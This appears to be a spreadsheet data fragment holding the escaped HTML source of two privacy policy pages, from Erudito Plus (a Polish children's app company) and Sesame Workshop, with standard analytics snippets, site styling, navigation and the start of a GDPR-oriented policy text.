&lt;link rel='stylesheet' id='wooow-style-css'  href='https://eruditoplus.com/core/assets/wooow/style.css?ver=4.9.13' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='wooow-main-style-css'  href='https://eruditoplus.com/core/assets/wooow/dist/css/main.min.css?ver=20151215' type='text/css' media='all' /&gt;
&lt;link rel='stylesheet' id='cookie-notice-front-css'  href='https://eruditoplus.com/core/modules/cookie-notice/includes/../css/front.min.css?ver=4.9.13' type='text/css' media='all' /&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/lib/js/jquery/jquery.js?ver=1.12.4'&gt;&lt;/script&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/lib/js/jquery/jquery-migrate.min.js?ver=1.4.1'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
/* &lt;!</t>
  </si>
  <si>
    <t>[CDATA[ */
var cnArgs = {"ajaxUrl":"https:\/\/eruditoplus.com\/insidemysite\/admin-ajax.php","nonce":"f3ad0741ea","hideEffect":"fade","position":"bottom","onScroll":"0","onScrollOffset":"100","onClick":"0","cookieName":"cookie_notice_accepted","cookieTime":"2592000","cookieTimeRejected":"2592000","cookiePath":"\/","cookieDomain":"","redirection":"0","cache":"1","refuse":"0","revokeCookies":"0","revokeCookiesOpt":"automatic","secure":"1"};
/* ]]&gt; */
&lt;/script&gt;
&lt;script type='text/javascript' src='https://eruditoplus.com/core/modules/cookie-notice/includes/../js/front.min.js?ver=2.0.3'&gt;&lt;/script&gt;
&lt;link rel='https://api.w.org/' href='https://eruditoplus.com/en/wp-json/' /&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://eruditoplus.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://eruditoplus.com/lib/wlwmanifest.xml" /&gt; 
&lt;meta name="generator" content="WordPress 4.9.13" /&gt;
&lt;link rel='shortlink' href='https://eruditoplus.com/en/?p=173' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://eruditoplus.com/en/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feruditoplus.com%2Fen%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="https://eruditoplus.com/en/wp-json/oembed/1.0/embed?url=https%3A%2F%2Feruditoplus.com%2Fen%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
&lt;style type="text/css"&gt;
.qtranxs_flag_ru {background-image: url(https://eruditoplus.com/core/modules/qtranslate-x/flags/ru.png); background-repeat: no-repeat;}
.qtranxs_flag_en {background-image: url(https://eruditoplus.com/core/modules/qtranslate-x/flags/gb.png); background-repeat: no-repeat;}
&lt;/style&gt;
&lt;link hreflang="ru" href="https://eruditoplus.com/ru/privacy-policy/" rel="alternate" /&gt;
&lt;link hreflang="en" href="https://eruditoplus.com/en/privacy-policy/" rel="alternate" /&gt;
&lt;link hreflang="x-default" href="https://eruditoplus.com/privacy-policy/" rel="alternate" /&gt;
&lt;meta name="generator" content="qTranslate-X 3.4.6.8" /&gt;
	&lt;!--</t>
  </si>
  <si>
    <t>Global site tag (gtag.js) - Google Analytics --&gt;
&lt;script async src="https://www.googletagmanager.com/gtag/js?id=UA-132481909-1"&gt;&lt;/script&gt;
&lt;script&gt;
   window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());
  gtag('config', 'UA-132481909-1');
&lt;/script&gt;	&lt;meta name="yandex-verification" content="95ded4eb65bca1bf" /&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Facebook Pixel Code --&gt;
    &lt;script&gt;
      ! function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
       n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '560642504749138');
      fbq('track', 'PageView');
    &lt;/script&gt;
    &lt;noscript&gt;&lt;img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=560642504749138&amp;ev=PageView&amp;noscript=1"
    /&gt;&lt;/noscript&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>End Facebook Pixel Code --&gt;
&lt;/head&gt;
&lt;body class="page-template-default page page-id-173 cookies-not-set"&gt;
&lt;header&gt;
    &lt;div class="container"&gt;
        &lt;div class="row middle-sm between-xs"&gt;
            &lt;div class="col-sm-2 col-xs-8"&gt;
                &lt;a class="image-logo" href="https://eruditoplus.com/en"&gt;
                    &lt;img src="https://eruditoplus.com/core/assets/wooow/dist/img/logo.svg" alt=""&gt;
                &lt;/a&gt;
            &lt;/div&gt;
            &lt;div class="col-sm-8 col-md-7"&gt;
                &lt;nav&gt;
                    &lt;ul class="main-menu"&gt;
                        &lt;li class="menu-item active"&gt;
                            &lt;a class="anchor" href="#"&gt;Homepage&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#games"&gt;Games&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#reviews"&gt;Reviews&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="menu-item"&gt;
                            &lt;a class="anchor" href="#contact"&gt;Contacts&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;li class="m-menu-item language-switcher"&gt;
                            &lt;a href="https://eruditoplus.com/?lang=ru" class=""&gt;RU&lt;/a&gt;
                            &lt;a href="https://eruditoplus.com/?lang=en" class="active"&gt;EN&lt;/a&gt;
                        &lt;/li&gt;
                        &lt;div class="col-md-6 social-panel m-menu-item"&gt;
	                        	                        	                        	                        	                        	                                                &lt;/div&gt;
                        &lt;!-- &lt;button class="menu-close m-menu-item"&gt;&amp;times;&lt;/button&gt; --&gt;
                    &lt;/ul&gt;
                &lt;/nav&gt;
             &lt;/div&gt;
            &lt;div class="col-md-3 m-hide nowrap"&gt;
                &lt;div class="box"&gt;
                    &lt;div class="row end-sm"&gt;
                        &lt;div class="col-md-6 col-sm-12 language-switcher"&gt;
                            &lt;a href="https://eruditoplus.com/?lang=ru" class=""&gt;RU&lt;/a&gt;
                            &lt;a href="https://eruditoplus.com/?lang=en" class="active"&gt;EN&lt;/a&gt;
                        &lt;/div&gt;
                        &lt;div class="col-md-6 social-panel d-visible"&gt;
	                        	                        	                        	                        	                        	                                                &lt;/div&gt;
                    &lt;/div&gt;
                &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;button id="menu-toggle" class="menu-toggle"&gt;
        &lt;img src="https://eruditoplus.com/core/assets/wooow/dist/img/sandwich.svg" alt="image for button"&gt;
    &lt;/button&gt;
&lt;/header&gt;    &lt;section class="container"&gt;
        &lt;div class="card pad-30"&gt;
                            &lt;h2&gt;</t>
  </si>
  <si>
    <t>Privacy Policy&lt;/h2&gt;
                &lt;p&gt;&lt;b&gt;Privacy policy&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;(updated version published in May 2021)&lt;/p&gt;
&lt;p&gt; Hi All,&lt;/p&gt;
&lt;p&gt;We, &amp;#8220;ERUDITO PLUS&amp;#8221; Sp. z o.o., a company incorporated under the laws of the Republic of Poland , registered address: Nowogrodzka street, h 50, office 515, 00-695 Warsaw Poland, registration number:  385722166 (hereinafter referred to as “We”, “Company”, and &amp;#8220;Wow Kids&amp;#8221;), have prepared this Privacy Policy (the “Policy”) to show how responsibly and seriously we treat the privacy of information, including personal data, of our applications users and visitors of http://eruditoplus.com (the “website”).&lt;/p&gt;
&lt;p&gt; This Policy will help you understand:&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1"&gt;– what is personal data;&lt;/li&gt;
&lt;li aria-level="1"&gt;– what personal data we collect;&lt;/li&gt;
&lt;li aria-level="1"&gt;– how and why we collect it;&lt;/li&gt;
&lt;li aria-level="1"&gt;– whom we can share personal data with;&lt;/li&gt;
&lt;li aria-level="1"&gt;– how to contact us if you have any questions regarding personal data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Personal data protection statement&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;We strive to protect the privacy of personal data that we obtain and process.</t>
  </si>
  <si>
    <t>In particular, we use cookies and other tracking technologies to improve the quality and efficiency of our services.&lt;/p&gt;
&lt;p&gt;List of cookies and other tracking technologies used by the Company on its website is available in a separate Cookie Policy.&lt;/p&gt;
&lt;p&gt;To learn more about what are cookies, how they work, how to manage or delete them, please visit &lt;a href="http://www.allaboutcookies.org" target="_blank" rel="noopener"&gt;&lt;span style="color: #0000ff;"&gt;www.allaboutcookies.org&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Please note that setting of certain browsers allow prohibiting cookies and other tracking technologies. Please be aware that switching some cookies off will result into loss of functionality of our website or application, and, accordingly, you will not be able to use all of their options, and some features / services might not be working correctly.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;i&gt;Rights of personal data subjects under the GDPR&lt;/i&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Please be advised that when you contact us you have through the identification process and submit your specific requirements, so that we can process your request and provi</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;!doctype html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
	&lt;meta charset="UTF-8" /&gt;
	&lt;meta name="description" content="Helping Kids Everywhere Grow Smarter, Stronger, and Kinder." /&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
	&lt;meta http-equiv="X-UA-Compatible" content="IE=edge" /&gt;
	&lt;meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1" /&gt;
	&lt;link rel="preload" as="font" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-regular.woff" /&gt;
	&lt;link rel="preload" as="font" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-medium.woff" /&gt;
	&lt;link rel="preload" as="font" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/fonts/vag-rounded-next-bold.woff" /&gt;
	&lt;script src="https://cmp.osano.com/AzZN1gTM8kX2P2Kih/1a6e9463-975c-4647-bdac-481aa5a9313f/osano.js"&gt;&lt;/script&gt;
	&lt;script&gt;(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
	new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
	j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src=
	'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
	})(window,document,'script','dataLayer','GTM-K9G2KZD');&lt;/script&gt;
	&lt;link rel="apple-touch-icon" sizes="180x180" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/apple-touch-icon.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="32x32" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon-32x32.png"&gt;
	&lt;link rel="icon" type="image/png" sizes="16x16" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon-16x16.png"&gt;
	&lt;link rel="manifest" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/site.webmanifest"&gt;
	&lt;link rel="mask-icon" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/safari-pinned-tab.svg" color="#00953b"&gt;
	&lt;link rel="shortcut icon" href="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/favicon.ico"&gt;
	&lt;meta name="msapplication-TileColor" content="#00a300"&gt;
	&lt;meta name="msapplication-config" content="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/favicons/browserconfig.xsml"&gt;
	&lt;meta name="theme-color" content="#ffffff"&gt;	
	&lt;meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /&gt;
	&lt;title&gt;Privacy Policy - Sesame Workshop&lt;/title&gt;
	&lt;meta name="description" content="Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content.</t>
  </si>
  <si>
    <t>We take this trust seriously and recognize" /&gt;
	&lt;link rel="canonical" href="http://sesameworkshop.org/about-us/legal/privacy-policy/" /&gt;
	&lt;meta property="og:locale" content="en_US" /&gt;
	&lt;meta property="og:type" content="article" /&gt;
	&lt;meta property="og:title" content="Privacy Policy - Sesame Workshop" /&gt;
	&lt;meta property="og:description" content="Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content. We take this trust seriously and recognize" /&gt;
	&lt;meta property="og:url" content="http://sesameworkshop.org/about-us/legal/privacy-policy/" /&gt;
	&lt;meta property="og:site_name" content="Sesame Workshop" /&gt;
	&lt;meta property="article:publisher" content="https://www.facebook.com/SesameWorkshop/" /&gt;
	&lt;meta property="article:published_time" content="2022-12-13T21:49:32+00:00" /&gt;
	&lt;meta property="article:modified_time" content="2023-03-30T16:21:42+00:00" /&gt;
	&lt;meta property="og:image" content="http://sesameworkshop.org/wp-content/uploads/2023/03/Social_Image3-1040x780.png" /&gt;
	&lt;meta property="og:image:width" content="1040" /&gt;
	&lt;meta property="og:image:height" content="780" /&gt;
	&lt;meta property="og:image:type" content="image/png" /&gt;
	&lt;meta name="twitter:card" content="summary_large_image" /&gt;
	&lt;meta name="twitter:site" content="@sesameworkshop" /&gt;
	&lt;meta name="twitter:label1" content="Est. reading time" /&gt;
	&lt;meta name="twitter:data1" content="25 minutes" /&gt;
	&lt;script type="application/ld+json" class="yoast-schema-graph"&gt;{"@context":"https://schema.org","@graph":[{"@type":"WebPage","@id":"http://sesameworkshop.org/about-us/legal/privacy-policy/","url":"http://sesameworkshop.org/about-us/legal/privacy-policy/","name":"Privacy Policy - Sesame Workshop","isPartOf":{"@id":"http://sesameworkshop.org/#website"},"datePublished":"2022-12-13T21:49:32+00:00","dateModified":"2023-03-30T16:21:42+00:00","description":"Sesame Workshop has been trusted by parents for decades to provide safe, entertaining, and educational content.</t>
  </si>
  <si>
    <t>We take this trust seriously and recognize","breadcrumb":{"@id":"http://sesameworkshop.org/about-us/legal/privacy-policy/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["http://sesameworkshop.org/about-us/legal/privacy-policy/"]}]},{"@type":"BreadcrumbList","@id":"http://sesameworkshop.org/about-us/legal/privacy-policy/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http://sesameworkshop.org/"},{"@type":"ListItem","position":2,"name":"About Us","item":"https://sesameworkshop.org/about-us/"},{"@type":"ListItem","position":3,"name":"Legal","item":"https://sesameworkshop.org/about-us/legal/"},{"@type":"ListItem","position":4,"name":"Privacy Policy"}]},{"@type":"WebSite","@id":"http://sesameworkshop.org/#website","url":"http://sesameworkshop.org/","name":"Sesame Workshop","description":"Helping Kids Everywhere Grow Smarter, Stronger, and Kinder. ","publisher":{"@id":"http://sesameworkshop.org/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http://sesameworkshop.org/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"http://sesameworkshop.org/#organization","name":"Sesame Workshop","url":"http://sesameworkshop.org/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"http://sesameworkshop.org/#/schema/logo/image/","url":"https://test.sesameworkshop.org/wp-content/uploads/2023/01/sw-logo-696x696-1.jpg","contentUrl":"https://test.sesameworkshop.org/wp-content/uploads/2023/01/sw-logo-696x696-1.jpg","width":696,"height":696,"caption":"Sesame Workshop"},"image":{"@id":"http://sesameworkshop.org/#/schema/logo/image/"},"sameAs":["https://www.facebook.com/SesameWorkshop/","https://twitter.com/sesameworkshop","https://instagram.com/sesameworkshop","https://www.tiktok.com/@sesamestreet"]}]}&lt;/script&gt;
&lt;link rel='dns-prefetch' href='//sesameworkshop.org' /&gt;
&lt;link rel='stylesheet' id='wp-block-library-css' href='http://sesameworkshop.org/wp/wp-includes/css/dist/block-library/style.min.css?ver=6.2' type='text/css' media='all' /&gt;
&lt;style id='whs-sw-char-stats-style-inline-css' type='text/css'&gt;
&lt;/style&gt;
&lt;link rel='stylesheet' id='magic-login-login-block-css' href='http://sesameworkshop.org/wp-content/plugins/magic-login-pro/dist/css/login-block-style.css?ver=1.8' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css' type='text/css'&gt;
body{--wp--preset--color--black: #151515;--wp--preset--color--cyan-bluish-gray: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#9b51e0;--wp--preset--color--bright-oscar: #00b140;--wp--preset--color--big-bird: #ffd400;--wp--preset--color--light-rosita: #a5e5d9;--wp--preset--color--oscar: #00953b;--wp--preset--color--zoe: #ff5100;--wp--preset--color--elmo: #ea0029;--wp--preset--color--prairie: #ed40a9;--wp--preset--color--count: #c028b9;--wp--preset--color--dark-count: #76236c;--wp--preset--color--grover: #0050b5;--wp--preset--color--cookie: #0082ca;--wp--preset--color--rosita: #00a19b;--wp--preset--color--dark-grey: #3d3d3d;--wp--preset--color--med-grey: #54585a;--wp--preset--color--grey: #a7a8aa;--wp--preset--color--light-grey: #f5f5f5;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: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t>
  </si>
  <si>
    <t>6px 6px 0px rgba(0, 0, 0, 1);}body { margin: 0;--wp--style--global--content-size: 1024px;--wp--style--global--wide-size: 1024px; }.wp-site-blocks &gt; .alignleft { float: left; margin-right: 2em; }.wp-site-blocks &gt; .alignright { float: right; margin-left: 2em; }.wp-site-blocks &gt; .aligncenter { justify-content: center; margin-left: auto; margin-right: auto; }:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow &gt; .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow &gt; .aligncenter{margin-left: auto !important;margin-right: auto !</t>
  </si>
  <si>
    <t>*{margin: 0;}body{padding-top: 0px;padding-right: 0px;padding-bottom: 0px;padding-left: 0px;}a:where(:not(.wp-element-button)){text-decoration: underline;}.wp-element-button, .wp-block-button__link{background-color: #32373c;border-width: 0;color: #fff;font-family: inherit;font-size: inherit;line-height: inherit;padding: calc(0.667em + 2px) calc(1.333em + 2px);text-decoration: none;}.has-black-color{color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) ! important;}.has-bright-oscar-color{color: var(--wp--preset--color--bright-oscar) !</t>
  </si>
  <si>
    <t>important;}.has-big-bird-color{color: var(--wp--preset--color--big-bird) ! important;}.has-light-rosita-color{color: var(--wp--preset--color--light-rosita) ! important;}.has-oscar-color{color: var(--wp--preset--color--oscar) !</t>
  </si>
  <si>
    <t>important;}.has-zoe-color{color: var(--wp--preset--color--zoe) ! important;}.has-elmo-color{color: var(--wp--preset--color--elmo) ! important;}.has-prairie-color{color: var(--wp--preset--color--prairie) !</t>
  </si>
  <si>
    <t>important;}.has-count-color{color: var(--wp--preset--color--count) ! important;}.has-dark-count-color{color: var(--wp--preset--color--dark-count) ! important;}.has-grover-color{color: var(--wp--preset--color--grover) !</t>
  </si>
  <si>
    <t>important;}.has-cookie-color{color: var(--wp--preset--color--cookie) ! important;}.has-rosita-color{color: var(--wp--preset--color--rosita) ! important;}.has-dark-grey-color{color: var(--wp--preset--color--dark-grey) !</t>
  </si>
  <si>
    <t>important;}.has-med-grey-color{color: var(--wp--preset--color--med-grey) ! important;}.has-grey-color{color: var(--wp--preset--color--grey) ! important;}.has-light-grey-color{color: var(--wp--preset--color--light-grey) !</t>
  </si>
  <si>
    <t>important;}.has-bright-oscar-background-color{background-color: var(--wp--preset--color--bright-oscar) ! important;}.has-big-bird-background-color{background-color: var(--wp--preset--color--big-bird) ! important;}.has-light-rosita-background-color{background-color: var(--wp--preset--color--light-rosita) !</t>
  </si>
  <si>
    <t>important;}.has-oscar-background-color{background-color: var(--wp--preset--color--oscar) ! important;}.has-zoe-background-color{background-color: var(--wp--preset--color--zoe) ! important;}.has-elmo-background-color{background-color: var(--wp--preset--color--elmo) !</t>
  </si>
  <si>
    <t>important;}.has-prairie-background-color{background-color: var(--wp--preset--color--prairie) ! important;}.has-count-background-color{background-color: var(--wp--preset--color--count) ! important;}.has-dark-count-background-color{background-color: var(--wp--preset--color--dark-count) !</t>
  </si>
  <si>
    <t>important;}.has-grover-background-color{background-color: var(--wp--preset--color--grover) ! important;}.has-cookie-background-color{background-color: var(--wp--preset--color--cookie) ! important;}.has-rosita-background-color{background-color: var(--wp--preset--color--rosita) !</t>
  </si>
  <si>
    <t>important;}.has-dark-grey-background-color{background-color: var(--wp--preset--color--dark-grey) ! important;}.has-med-grey-background-color{background-color: var(--wp--preset--color--med-grey) ! important;}.has-grey-background-color{background-color: var(--wp--preset--color--grey) !</t>
  </si>
  <si>
    <t>important;}.has-light-grey-background-color{background-color: var(--wp--preset--color--light-grey) ! important;}.has-black-border-color{border-color: var(--wp--preset--color--black) ! important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) ! important;}.has-bright-oscar-border-color{border-color: var(--wp--preset--color--bright-oscar) ! important;}.has-big-bird-border-color{border-color: var(--wp--preset--color--big-bird) !</t>
  </si>
  <si>
    <t>important;}.has-light-rosita-border-color{border-color: var(--wp--preset--color--light-rosita) ! important;}.has-oscar-border-color{border-color: var(--wp--preset--color--oscar) ! important;}.has-zoe-border-color{border-color: var(--wp--preset--color--zoe) !</t>
  </si>
  <si>
    <t>important;}.has-elmo-border-color{border-color: var(--wp--preset--color--elmo) ! important;}.has-prairie-border-color{border-color: var(--wp--preset--color--prairie) ! important;}.has-count-border-color{border-color: var(--wp--preset--color--count) !</t>
  </si>
  <si>
    <t>important;}.has-dark-count-border-color{border-color: var(--wp--preset--color--dark-count) ! important;}.has-grover-border-color{border-color: var(--wp--preset--color--grover) ! important;}.has-cookie-border-color{border-color: var(--wp--preset--color--cookie) !</t>
  </si>
  <si>
    <t>important;}.has-rosita-border-color{border-color: var(--wp--preset--color--rosita) ! important;}.has-dark-grey-border-color{border-color: var(--wp--preset--color--dark-grey) ! important;}.has-med-grey-border-color{border-color: var(--wp--preset--color--med-grey) !</t>
  </si>
  <si>
    <t>important;}.has-grey-border-color{border-color: var(--wp--preset--color--grey) ! important;}.has-light-grey-border-color{border-color: var(--wp--preset--color--light-grey) ! important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !</t>
  </si>
  <si>
    <t xml:space="preserve">important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel='stylesheet' id='theme-stylesheet-css' href='http://sesameworkshop.org/wp-content/themes/sesame-workshop/style.css?ver=2023-04-06T01-11-36-684Z' type='text/css' media='all' /&gt;
&lt;link rel="https://api.w.org/" href="http://sesameworkshop.org/wp-json/" /&gt;&lt;link rel="alternate" type="application/json" href="http://sesameworkshop.org/wp-json/wp/v2/pages/73" /&gt;&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://sesameworkshop.org/wp/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://sesameworkshop.org/wp/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress 6.2" /&gt;
&lt;link rel='shortlink' href='http://sesameworkshop.org/?p=73' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="http://sesameworkshop.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fsesameworkshop.org%2Fabout-us%2Flegal%2Fprivacy-policy%2F" /&gt;
&lt;link rel="alternate" type="text/xml+oembed" href="http://sesameworkshop.org/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fsesameworkshop.org%2Fabout-us%2Flegal%2Fprivacy-policy%2F&amp;#038;format=xml" /&gt;
			&lt;/head&gt;
&lt;body class="page-template page-template-legal page-template-legal-php page page-id-73 page-child parent-pageid-71" data-template="base.twig"&gt;
	&lt;!-- Google Tag Manager (noscript) --&gt;
	&lt;noscript&gt;&lt;iframe src="https://www.googletagmanager.com/ns.html?id=GTM-K9G2KZD"
	height="0" width="0" style="display:none;visibility:hidden"&gt;&lt;/iframe&gt;&lt;/noscript&gt;
	&lt;!-- End Google Tag Manager (noscript) --&gt;
	&lt;a tabindex="0" href="#start-of-content" class="skip-to-content"&gt;Skip to content&lt;/a&gt;
	&lt;header class="page-header"&gt;
&lt;nav class="sw-nav"&gt;
  &lt;div class="sw-nav__main"&gt;
    &lt;div class="sw-nav__logo"&gt;
      &lt;a href="/"&gt;
&lt;img loading="lazy" class="sw-logo" src="http://sesameworkshop.org/wp-content/themes/sesame-workshop/images/logo_full_color.svg" alt="Sesame Workshop" /&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="sw-nav__menu"&gt;
      &lt;div class="sw-nav__menu__bars"&gt;
&lt;i class="sw-icon fa-solid fa-bars" aria-hidden="true"&gt;&lt;/i&gt;
      &lt;/div&gt;
      &lt;ul class="sw-nav__menu__list"&gt;
                  &lt;li&gt;
            &lt;div&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--primary " href="http://sesameworkshop.org/resources/" title="Family Resources"&gt;Family Resources&lt;/a&gt;
              &lt;/div&gt;
            &lt;div class="sw-nav__subnav "&gt;
  &lt;ul&gt;
          &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/abcs-and-123s/" title="ABCs and 123s" target="_self"&gt;
      &lt;span&gt;ABCs and 123s&lt;/span&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
          &lt;/a&gt;
                    &lt;div class="sw-nav__subnav__dropdown" id=""&gt;
            &lt;ul class="sw-nav__subsubnav"&gt;
                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="http://sesameworkshop.org/topics/science-for-kids/" title="Science" target="_self"&gt;Science&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/science-for-kids/curiosity/" title="Curiosity" target="_self"&gt;Curiosity&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/art/" title="Art" target="_self"&gt;
      &lt;span&gt;Art&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/financial-education/" title="Financial Education" target="_self"&gt;
      &lt;span&gt;Financial Education&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li class="sw-nav__subtopic-nav"&gt;
                    &lt;div&gt;
                      &lt;a href="http://sesameworkshop.org/topics/language-literacy/" title="Language and Literacy" target="_self"&gt;Language and Literacy&lt;/a&gt;
                      &lt;span class="sw-nav__subtopic-nav__dropdown-target"&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
                      &lt;/span&gt;
                    &lt;/div&gt;
                    &lt;ul&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/language-literacy/reading/" title="Reading" target="_self"&gt;Reading&lt;/a&gt;
                        &lt;/li&gt;
                                              &lt;li&gt;
                          &lt;a href="http://sesameworkshop.org/topics/language-literacy/vocabulary/" title="Vocabulary" target="_self"&gt;Vocabulary&lt;/a&gt;
                        &lt;/li&gt;
                                          &lt;/ul&gt;
                  &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/math/" title="Math" target="_self"&gt;
      &lt;span&gt;Math&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                                                &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/topics/school-readiness/" title="School Readiness" target="_self"&gt;
      &lt;span&gt;School Readiness&lt;/span&gt;
          &lt;/a&gt;
                    &lt;/li&gt;
                                          &lt;/ul&gt;
          &lt;/div&gt;
              &lt;/li&gt;
          &lt;li&gt;
      &lt;a class="sw-nav-tab sw-nav-tab--secondary " href="http://sesameworkshop.org/healthy-minds-and-bodies/" title="Healthy Minds and Bodies" target="_self"&gt;
      &lt;span&gt;Healthy Minds and Bodies&lt;/span&gt;
&lt;i class="sw-icon fa-solid fa-caret-down" aria-hidden="true"&gt;&lt;/i&gt;
          &lt;/a&gt;
                    &lt;div class="sw-nav__subnav__dropdown" id=""&gt;
            &lt;ul class="sw-nav__subsubnav"&gt;
                                                &lt;li&gt;
